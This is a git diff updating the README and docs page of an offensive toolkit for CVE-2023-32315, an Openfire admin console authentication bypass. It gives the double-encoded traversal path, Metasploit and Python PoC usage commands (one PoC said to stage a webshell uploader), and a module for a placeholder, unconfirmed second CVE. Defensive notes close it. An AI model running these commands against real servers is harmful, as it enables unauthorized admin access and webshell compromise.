updated docs

README.md

@@ -16,12 +16,12 @@
 
 ## 🔥 Overview
 
-**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass). Built for red-teamers and researchers, it provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation.
+**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass) and a placeholder unauthenticated setup endpoint weakness (CVE-2023-XXXX). It provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation.
 
 ## 🧩 Modules
 
 - **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console.
-- **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework.
+- **metasploit-module/**: Custom Ruby exploit modules (admin bypass + setup POST).
 - **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17).
 - **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports.
 
@@ -50,15 +50,18 @@ Expected output lines in Burp:
 
 > Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes.
 
-## 🚀 CVE-2023-32315 Summary
+## 🚀 CVE Targets
 
-Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal:
+| CVE | Module / PoC | Technique | File |
+|-----|--------------|-----------|------|
+| CVE-2023-32315 | Admin Console Auth Bypass | Double-encoded path traversal | `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb` |
+| CVE-2023-XXXX (placeholder) | Unauth Setup POST | Residual setup endpoint parameter injection | `metasploit-module/exploits/linux/http/openfire_setup_unauth.rb` |
+
+Traversal example:
 ```
 /setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp
 ```
 
-Once accessed, an attacker can manually or programmatically upload a webshell, hijack sessions, or escalate to RCE under specific deployment conditions.
-
 ## 🛠 Recon Flow
 
 Run:
@@ -81,27 +84,43 @@ python3 exploit-core/openfire_exploit.py --target http://<target-ip>:9090
 
 Checks if the bypass URL is accessible and optionally stages a webshell uploader.
 
-## 🩸 Metasploit
+## 🩸 Metasploit Modules
 
-Use:
+Admin bypass:
 ```bash
 use exploit/linux/http/openfire_admin_bypass
-set RHOST <target>
+set RHOSTS <target>
 run
 ```
 
-Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb`
-
+Unauth setup POST (parameter injection placeholder):
+```bash
+use exploit/linux/http/openfire_setup_unauth
+set RHOSTS <target>
+set TARGETURI /setup/setup-someform.jsp   # adjust if different
+run
+```
 
-## 📂 Git Strategy
+Both modules live under:
+```
+metasploit-module/exploits/linux/http/
+```
+If not copying into the core Metasploit tree, load the local path inside `msfconsole`:
+```bash
+loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits
+reload_all
+```
 
-Each module is self-contained. Shared `.gitignore` excludes recon output, logs, and IDE artifacts.
+## 📂 Git / Repository Slimming
 
-All documentation is mirrored to `/docs/` for GitHub Pages deployment. To regenerate documentation, use:
+The included `.gitignore` now excludes:
+- Ruby / Bundler artifacts (`.bundle/`, `vendor/bundle/`, `*.gem`)
+- Logs & temp (`log/`, `tmp/`, `coverage/`)
+- Native build products (`*.o`, `*.so`, `*.dSYM/`)
+- Ruby env files (`.ruby-version`, `.rbenv-vars`)
+- IDE & build caches
 
-```bash
-./recon-tools/gen_docs.sh
-```
+Feel free to add large scan outputs (`output/*.txt` or `*.html`) if you want a leaner commit history; sample patterns are commented.
 
 ## 📣 Credits
 
@@ -111,7 +130,7 @@ Developed by Taka (2025) as a security research utility in response to active ex
 
 To view a rendered version of this documentation:
 
-- [GitHub Pages: docs/index.md](docs/index.md) ← Mirror this README as index.md
+- [GitHub Pages: docs/index.md](docs/index.md) ← Mirror of key README content
 - Hosting enabled via GitHub Pages > Settings > Pages > Source: `main /docs`
 
 ## 📸 Screenshots / Demo
@@ -123,7 +142,7 @@ Live demo recording with CLI + browser-based confirmation (Burp interaction, FFU
 
 For defenders and system administrators:
 - Upgrade Openfire to **≥ 4.6.9** immediately.
-- Disable `/setup/` path in production deployments.
+- Disable or harden `/setup/` path in production deployments.
 - Use WAF to block double-encoded traversal attempts.
-- Monitor logs for unusual access to `admin-login.jsp`
+- Monitor logs for unusual access to `admin-login.jsp` and lingering setup JSPs.
 - Use Burp Collaborator or Canary Tokens to trace callback attempts.

docs/index.md

@@ -10,107 +10,79 @@
 
 ## 🔥 Overview
 
-**Openfire Exploit Suite** is a full-spectrum offensive toolkit targeting CVE-2023-32315 (Openfire Admin Console Auth Bypass). Built for red-teamers and researchers, it provides an end-to-end exploit workflow including recon, PoC execution, Metasploit integration, and Burp Extender automation.
+**Openfire Exploit Suite** provides recon → PoC → Metasploit exploitation tooling for:
+- CVE-2023-32315 (Admin Console Auth Bypass)
+- Placeholder CVE-2023-XXXX (Residual setup POST endpoint abuse)
 
 ## 🧩 Modules
 
-- **exploit-core/**: Python PoC exploiting unauthenticated access to the Openfire admin console.
-- **metasploit-module/**: Custom Ruby module compatible with Metasploit Framework.
-- **burp-automation/**: Java-based Burp Suite Extender plugin (minimal, Java 17).
-- **recon-tools/**: Bash toolkit chaining `nmap`, `ffuf`, and `nikto`, with auto-generated `.md` and `.html` reports.
+- **exploit-core/**: Python PoC for admin bypass.
+- **metasploit-module/**: Ruby modules (bypass + setup POST injection).
+- **burp-automation/**: Minimal Burp Extender.
+- **recon-tools/**: Automated scanning + report generation.
 
-## 🧠 Burp Extender Plugin (minimal)
+## 🩸 Metasploit Modules
 
-Entry point class (required by Burp):
-```
-burp-automation/src/main/java/burp/BurpExtender.java
+Admin bypass:
+```bash
+use exploit/linux/http/openfire_admin_bypass
+set RHOSTS <target>
+run
 ```
 
-This class implements `IBurpExtender` and `IHttpListener` and logs basic request URLs. The packaged JAR intentionally includes only the entry class so that Burp’s own API types are used at runtime (avoids interface mismatches).
-
-Build and load into Burp:
-
+Unauth setup POST:
 ```bash
-cd burp-automation
-./gradlew clean build
-jar tf build/libs/burp-automation.jar | sort   # should list only: burp/BurpExtender.class (plus META-INF)
+use exploit/linux/http/openfire_setup_unauth
+set RHOSTS <target>
+set TARGETURI /setup/setup-someform.jsp
+run
 ```
 
-In Burp Suite: Extender → Extensions → Add → `build/libs/burp-automation.jar`
-
-Expected output lines in Burp:
-- `[BurpExtender] IHttpListener registered`
-- `[HTTP] https://example/…` (for each intercepted request)
-
-> Note: If you want to extend detection (e.g., reflected params, XSS/SQLi heuristics), add a separate `ExploitLogic` class and wire it from `processHttpMessage`, but keep the final JAR free of local interface classes.
+Module directory:
+```
+metasploit-module/exploits/linux/http/
+```
+Local load (if not copied into framework tree):
+```bash
+loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits
+reload_all
+```
 
 ## 🚀 CVE-2023-32315 Summary
 
-Openfire ≤ 4.6.8 allows unauthenticated access to the admin interface via double-encoded path traversal:
+Double-encoded traversal to reach admin login:
 ```
 /setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp
 ```
 
-Once accessed, an attacker can manually or programmatically upload a webshell, hijack sessions, or escalate to RCE under specific deployment conditions.
-
 ## 🛠 Recon Flow
-
-Run:
 ```bash
 cd recon-tools
 ./run_recon.sh <target-ip>
 ```
-
-Output:
-- `nmap_full_scan.txt`
-- `ffuf_results.html`
-- `nikto_results.txt`
-- `recon_report.md`, `recon_report_*.html`
+Generates: nmap_full_scan.txt, ffuf_results.html, nikto_results.txt, recon_report.md / HTML variants.
 
 ## 🐍 Python PoC
-
 ```bash
 python3 exploit-core/openfire_exploit.py --target http://<target-ip>:9090
 ```
 
-Checks if the bypass URL is accessible and optionally stages a webshell uploader.
-
-## 🩸 Metasploit
-
-Use:
+## 🧠 Burp Extender
+Entry: `burp-automation/src/main/java/burp/BurpExtender.java`
+Build:
 ```bash
-use exploit/linux/http/openfire_admin_bypass
-set RHOST <target>
-run
+cd burp-automation
+./gradlew clean build
 ```
 
-Module path: `metasploit-module/exploits/linux/http/openfire_admin_bypass.rb`
-
-## 📂 Git Strategy
-
-Each module is self-contained. Shared `.gitignore` excludes recon output, logs, and IDE artifacts.
-
-## 📣 Credits
-
-Developed by Taka (2025) as a security research utility in response to active exploitation trends. MIT Licensed. Use responsibly.
-
-## 📊 GitHub Pages
-
-To view a rendered version of this documentation:
-
-- [GitHub Pages: docs/index.md](docs/index.md)
-- Hosting enabled via GitHub Pages > Settings > Pages > Source: `main /docs`
-
-## 📸 Screenshots / Demo
-
-Live demo recording with CLI + browser-based confirmation (Burp interaction, FFUF hits, webshell upload) coming soon.
-- Suggest capturing GIFs via [asciinema.org](https://asciinema.org) or `peek` tool for animated command-line visuals.
+## 📂 Repo Slimming
+Key `.gitignore` patterns exclude Bundler, logs, coverage, native objects, IDE caches. Optionally extend to large `output/` artifacts.
 
 ## 🔐 Defensive Notes
+- Upgrade to ≥ 4.6.9
+- Remove/lock `/setup/` after install
+- Block double-encoded traversal at edge
+- Monitor access to legacy setup JSPs
 
-For defenders and system administrators:
-- Upgrade Openfire to **≥ 4.6.9** immediately.
-- Disable `/setup/` path in production deployments.
-- Use WAF to block double-encoded traversal attempts.
-- Monitor logs for unusual access to `admin-login.jsp`
-- Use Burp Collaborator or Canary Tokens to trace callback attempts.
+## 📣 Credits
+Research & tooling by Taka (2025). Use responsibly.